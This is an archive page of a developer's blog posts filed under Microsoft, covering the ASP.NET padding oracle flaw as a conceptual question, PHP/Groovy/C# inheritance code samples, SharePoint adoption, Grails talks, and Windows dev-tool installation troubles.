You are currently browsing the archives for the Microsoft category


asp.net oracle padding flaw – question?

By now many of you have heard of the ASP.NET Oracle Padding Flaw. There’s a number of posted workarounds, and MS will be issuing a patch soon to fix things.

From threatpost.com:

The problem lies in the way that ASP.NET, Microsoft’s popular Web framework, implements the AES encryption algorithm to protect the integrity of the cookies these applications generate to store information during user sessions. A common mistake is to assume that encryption protects the cookies from tampering so that if any data in the cookie is modified, the cookie will not decrypt correctly. However, there are a lot of ways to make mistakes in crypto implementations, and when crypto breaks, it usually breaks badly.

The issue here seems to be that there’s *anything* of value stored in the cookie beyond a generic token.  This really does seem to be the case though.  Watching the DNN exploit, it looks like the fact that someone is a superuser is encoded in the cookie value itself.  This would seem to be an architectural flaw in DNN, but I get the feeling that most ASP.NET apps were/are trusting of the encyrption mechanism to hide whatever data they’re sending down in cookies.  This seems to be a more fundamental flaw in design than any AES algorithm MS may have had an issue with.

I’m reminded of a company I worked for years ago which kept track of sessions by incrementing a counter in a DB, grabbing that counter, encrypting it, then using that value as the value in the cookie.  This was thought of as ‘secure’ because encryption was being used.  I tried to argue for random values as the cookie token, but was told that ‘random isn’t really random’.  I pointed out that dozens of people (who no longer worked there) had access to the encryption key, and once I knew how to decrypt one token – which would give me a value, of, say 4554678, changing the value to 4554672 then reencrypting would be trivial and allow me to impersonate other users on the system.  My concerns were dismissed because I wasn’t a ‘senior’ engineer, apparently I didn’t understand Java or cryptography enough to understand their level of sophistication.  After all, ‘random isn’t really random’.

This approach of putting sensitive data in a cookie, then encrypting it, seems to be alive and well, and that scares me.  But I have no real good way of opting out of such sites.

So my question (yes I had one) is… is my understanding of what ASP.NET apps are doing that make this flaw so dangerous an accurate understanding?  Or have I missed something?


I'm currently working on a book for web freelancers, covering everything you need to know to get started or just get better. Want to stay updated? Sign up for my mailing list to get updates when the book is ready to be released!

Web Developer Freelancing Handbook

TriNUG SharePoint group meeting

Just got done with attending the TriNUG SharePoint group meeting.  Mike Gannotti presented on how to adopt SharePoint in an organization.  Lots of good stuff, and this was far more about social media tools adoption in orgs rather than much that was specific to SharePoint.  The biggest kerfuffle tonight was Mike’s bombshell statement that “if users have to search, you’ve failed”.  Lots of good back and forth on this, although I don’t have much time to document the whole thing. 

I did ask whether SharePoint search would take in to account *where* a search is initiated from.  For example, if I start a search in a particular wiki, the search should rank those wiki posts higher.  The quick answers I got were that either SharePoint does that out of the box, or it can be tuned to do that.  Seems like it would make more sense that have that default behaviour if it’s not. 

Someone else across the room brought up that something that needs to be done is someone should be watching the search queries to see how people use the system, then tune for that future users.  This is likely something that would need to be revisited later.

Mike also talked about using scoring to help encourage participation.  Giving points to people who create content, and other points to people who engage with the content (ratings, replies, downloads), then allowing people to redeem the points for stuff (he’s getting a netbook based on this point system) is a way to get people using the system and putting in content which will be held for the long term inside the company in question.  Neat idea.  Knowing that companies are actually *doing* it is even better.  :)


I'm currently working on a book for web freelancers, covering everything you need to know to get started or just get better. Want to stay updated? Sign up for my mailing list to get updates when the book is ready to be released!

Web Developer Freelancing Handbook

PPP PHP question v2 – the humbler post

Obviously I rubbed some people the wrong way, and didn’t explain my question(s) clearly enough from the outset, then got wrapped up in taking some offense from some of the responses.  Reviewing everything today I can see where I could have responded differently, and more clearly, earlier on.  Apologies to anyone who was offended (if anyone was).

I do think the original point(s) were somewhat lost.  To the original poster who offered the banking analogy – thank you.  However, I don’t think it’s enough, and is clearly at odds with some of my other experiences with Java/Groovy.  Let me show two code samples here (assuming WP doesn’t mangle the code too much – I need to get one of those code display plugins in here!)

In Groovy (Java), if I run this:

===========================
class person {
private email = “person email”
protected phone = “person phone”
public name = “person name”
def showInfo() {
println this.email + ” ” + this.name + ” ” + this.phone
this.onlyInUser()
}
}
class user extends person {
private email = “user email”
protected phone = “user phone”
public name = “user name”
def onlyInUser() {
println “I’m in the user class definition”
}
def showInfo() {
super.showInfo()
println this.email + ” ” + this.name + ” ” + this.phone
}
}
def u = new user()
u.showInfo()
===========================
I get this output:

===========================
person email person name person phone
I’m in the user class definition
user email user name user phone
===========================

*All* the *this* property accesses are class-bound, it seems, but the this.onlyInUser() call still calls the method in the child class.

In C# (my C# isn’t hot, but this *seems* to be a correct re-implementation of the same logic) if I run :

===========================

using System;
class person  {
public string name = “person name”;
protected string email= “person email”;
private string phone = “person phone”;

public virtual void showInfo() {
Console.WriteLine(“In the person showInfo method”);
Console.WriteLine( this.name + ” ” + this.phone + ” ” + this.email);
}
}

class User : person {
public new string name = “user name”;
protected new string email= “user email”;
private new string phone = “user phone”;

public override void showInfo() {
base.showInfo();
Console.WriteLine(“In the user showInfo method”);
Console.WriteLine( this.name + ” ” + this.phone + ” ” + this.email);
}

// Main begins program execution.
public static void Main()
{
User u = new User();
u.showInfo();
}
}

===========================

I get

===========================

In the person showInfo method
person name person phone person email
In the user showInfo method
user name user phone user email

===========================

Running seemingly equivalent code in PHP (5.2.5)
===========================
<?php
error_reporting(E_ALL);
class person {
private $email = “private person email”;
protected $phone = “protected person phone”;
public $name = “public person name”;
public function showInfo() {
echo $this->email.” – “.$this->phone.” – “.$this->name.”\n”;
$this->onlyInUser();
}
}
class user extends person {
private $email = “private user email”;
protected $phone = “protected user phone”;
public $name = “public user name”;
public function onlyInUser() {
echo “I’m in the user class definition\n”;
}
public function showInfo() {
parent::showInfo();
echo $this->email.” – “.$this->phone.” – “.$this->name.”\n”;
}
}
$u = new user();
$u->showInfo();
===========================
I get the following output:

===========================
private person email – protected user phone – public user name
I’m in the user class definition
private user email – protected user phone – public user name
===========================

There’s clearly a difference here, and it’s likely related to an logical difference between super and parent.  My limited Java-fu and C#-fu being what they are, I’m not able to quite grok why there’s a difference in behaviour between the examples ago.

Hopefully this is humble enough to garner some collective wisdom.  I’m not bashing PHP here, nor anyone’s contributions or anything of the sort.  Simply asking – why are these behaving differently?


I'm currently working on a book for web freelancers, covering everything you need to know to get started or just get better. Want to stay updated? Sign up for my mailing list to get updates when the book is ready to be released!

Web Developer Freelancing Handbook

Getting ready for Codestock

I’m getting ready for codestock this coming saturday.  I’m going to be giving a talk on Grails, the Groovy/Java web framework.  I’d put together a set of slides and prepared a presentation, but I read the times wrong.  I thought I had a half hour – it’s more like 70 minutes.  So I’m having to flesh out the presentation with some more detail.

To help with that, I’ve picked up a copy of Beginning Groovy and Grails from Apress.  I saw one of the authors, Christopher Judd, at Codemash this past January.  I liked his presentation, but felt he spent too much time explaining why web development in Java was difficult in the first place, rather than just jumping in to Grails.  The book doesn’t do that as much, and I’m finding it’s a good book all around – better than I expected.  The sections on security (jsecurity, acegi, etc.) look useful – haven’t tried them yet, but anything in writing is better than where the state of Grails security docs were a few months ago :)

I also ‘led’ a small group discussion on Grails and Groovy at Barcamp RDU this past weekend.  I got to meet Shawn Hartsock in person, someone whose Groovy/Grails writings on his blog have helped me out several times.  He sat in with the group (along with Robert Fischer – a recent MN transplant) and helped explain many topics I didn’t have as much experience with.  Thanks Shawn, Robert and everyone else who showed up!

One thing that I mentioned there and I’ll mention here too – the state of Groovy and Grails marketing.  It’s not *bad*, but it’s seemingly targetted at current Java developers.  I’d say many Java devs who’ve wanted rapid dev functionality have gone on to other pastures already.  Not entirely, to be sure, and projects like Grails have probably helped keep some antsy devs squarely on home turf.  And certainly part of the attraction is the leveraging of existing Java libraries (not just under the hood but for use in userland apps as well).  There still seems to be a problem getting the word out about Groovy and Grails past the existing Java communities.  I’ll be presenting at a primarily .NET gathering this weekend, so maybe that’s a start.  I don’t expect everyone to drop whatever they’re doing just to  go do Grails.  But having more people exposed to it will give them a current view of modern web app development in Java, which can’t be a bad thing (or shouldn’t be, anyway!)


I'm currently working on a book for web freelancers, covering everything you need to know to get started or just get better. Want to stay updated? Sign up for my mailing list to get updates when the book is ready to be released!

Web Developer Freelancing Handbook

Running .Net code on a JVM?

I just stumbled on this article Sunday morning.  This snippet sums up the product:

There is a way of marrying the advantages of .NET development with Java deployment. Using Mainsoft for Enterprise Edition (EE), Visual Studio developers can write code in .NET and cross-compile it to Java. Not only code, but pieces of the Framework; Mainsoft has worked with Miguel de Icaza and Novell to port pieces of the Mono project to Java. Your limits in calling Framework classes, especially for Web apps, are almost nonexistent.

Sounds very intriguing.  But, is it just a solution in search of a problem?  Would many .Net shops embrace a Java app server for deployment?  Is this too niche of a product to take off beyond a few edge cases?  Or is this sort of thing the future?

What would, I think, be more useful for many shops is to take Java code and compile it in to something that targetted the .Net CLR.  Are there any projects that do this/


I'm currently working on a book for web freelancers, covering everything you need to know to get started or just get better. Want to stay updated? Sign up for my mailing list to get updates when the book is ready to be released!

Web Developer Freelancing Handbook

SQL Server driver for PHP5

For anyone that has struggled with using PHP and MSSQL over the years, this one may come as some pleasant news (if you’re still in that situation).  Microsoft has put out a preview of “SQL Server 2005 Driver for PHP” back in October 2007 (yeah, I just found out this morning!).  Ehh… not as impressed as I thought I would be, in that it’s still only for PHP apps deployed on Windows.  This isn’t replacing freetds any time soon.  I guess I’m still wondering what the market for “PHP apps deployed on Windows talking to SQL Server” really is – most of the shared hosting accounts I’ve seen, even on Windows, offer MySQL or Access as the database. 

Scratch that – I’ve started to see SQL server as an option more recently (bit of a brain pause there a moment ago!).  This is perhaps a bit of a chicken/egg situation – if there’s a more stable driver, this may help hosting companies push SQL Server as their default DB option (perhaps eventually charging for a MySQL installation as an option?).

There’s a video of the team talking about the project here (but you’ll need silverlight to watch it!) and the team’s blog here.

Powered by ScribeFire.


I'm currently working on a book for web freelancers, covering everything you need to know to get started or just get better. Want to stay updated? Sign up for my mailing list to get updates when the book is ready to be released!

Web Developer Freelancing Handbook

MS dev tool installation woes

I’ve not done any major development work specifically inside MS Windows for a few years now, and I’ve forgotten what some of the hassles are.  Today I revisited that world, looking to play with the new ASP.NET and .NET 3.5 framework.  Whew what a hassle.  Let me start by saying I can only run Windows XP (home I think) in a VMWare environment under Linux.  My XP partition on my laptop just quit working in Oct 2006, after about 6 months of use.  When I boot up I get a screen telling me I need to reinstall from the source disks.  Given that this was a laptop, all you get is a disk which reformats your drive, or at least that’s how it looks.  I already had a linux partition on there with real data, so I quit using the XP partition altogether. 

Yes, I ‘pirated’ a version of XP for my VMWare player – I feel morally justified in doing so because the XP I paid for broke itself after 6 months of use, but technically I’ve broken some copyright law somewhere.

Given the disk space issue, I only have a 6 gig drive on the XP image, which doesn’t get you much these days.  I had Visual Studio Express 2005 (both C# and VB editions), and tried to remove one to make room for VS Web Express 2008.  No dice – it tried to uninstall for about 20 minutes, and the progress bar quit moving, so I had to kill that process, and then I couldn’t re-uninstall cause it had removed the uninstall program already (or couldn’t find it) so I was left with half an installation.  I had enough disk space at that time for VBWeb2008, but it was still annoying.

So I started installing, and the installer just quit moving part way through.  Again, waiting 15 minutes and *no* progress movement on installing VSWebExpress2008 – what’s up with that?  So I cancelled, and tried to remove the .net 2.0 library (cause the VSWeb will install .net 3.5 anyway).  The .net uninstaller wouldn’t uninstall.  Maybe I just need to leave it overnight and see if it uninstalls?  I know virtualized machines are slower, but this is just insanity – it’s not really working, but there’s no way (I know of anyway) to get past these issues. 

I’d love to try the latest .NET 3.5 stuff, but apparently I’m not cutting edge enough?  Sorry for sounding paranoid, but might this be an issue with running under VMWare?  I have no other choice right now, and I’m not going to get another machine this week just to play with stuff, but does anyone else have these problems?

Linux has its issues, no doubt.  I have problems all day long, but few that ever involve the installation of software just hanging, or software removal hanging.  Java apps on Linux are certainly no walk in the park, with path issues, various minor bugs here and there and whatnot, but at least I can get things like eclipse and netbeans *installed*.  FWIW, I didn’t have as many problems on my ‘corporate’ PC back in 2007, but I still had some, they just weren’t as fatal as these have been (so far).

Powered by ScribeFire.


I'm currently working on a book for web freelancers, covering everything you need to know to get started or just get better. Want to stay updated? Sign up for my mailing list to get updates when the book is ready to be released!

Web Developer Freelancing Handbook

Need Excel macro

Looking for an Excel macro or whatever it’s called that would record the time/date a row was changed in to a column in that row.  That might be recursive if not handled properly.  This seems like it would just come standard in Excel – have a cell indicate the last updated time/date of something in its own row or column, but I’m not finding anything like that.  Any one seen something like this before?

Thanks!


I'm currently working on a book for web freelancers, covering everything you need to know to get started or just get better. Want to stay updated? Sign up for my mailing list to get updates when the book is ready to be released!

Web Developer Freelancing Handbook

Latest podcast up

I had a good conversation with Joe Fiorini about balancing his daily work in .NET with a passion and enthusiasm for Ruby on Rails.  Have a listen.


I'm currently working on a book for web freelancers, covering everything you need to know to get started or just get better. Want to stay updated? Sign up for my mailing list to get updates when the book is ready to be released!

Web Developer Freelancing Handbook

Latest podcast up – Codemash Open Spaces – Open Source in .NET

I had a fun time recording this ‘open spaces’ meeting at Codemash last week.  This was led by Joe Brinkman from the DotNetNuke project, and joining us was Kevin Devine from the Euclid Public Library, Sara Ford from Codeplex @ Microsoft, Steven Harman from the Subtext project and – shoot – I do not have the contact info for the other gentleman who is on the talk. Oh wait – yes I do – Jay Wren!   The sound was *decent*, although there was a shortage of mics.  I also accidentally dropped Joe’s volume on a few occasions, but overall it felt like a great chat, so here it is.

Topics include the pros and cons of getting Contributor License Agreements in place on an open source project, building community, a bit of good natured back and forth on Microsoft’s role in all this, interesting comparisons to the Java community, and more.

BTW, this is just a sample of many of the informal chats that happen for 2 days @ codemash.  If you like these types of discussions, join us next year!

The podcast is up at http://www.webdevradio.com


I'm currently working on a book for web freelancers, covering everything you need to know to get started or just get better. Want to stay updated? Sign up for my mailing list to get updates when the book is ready to be released!

Web Developer Freelancing Handbook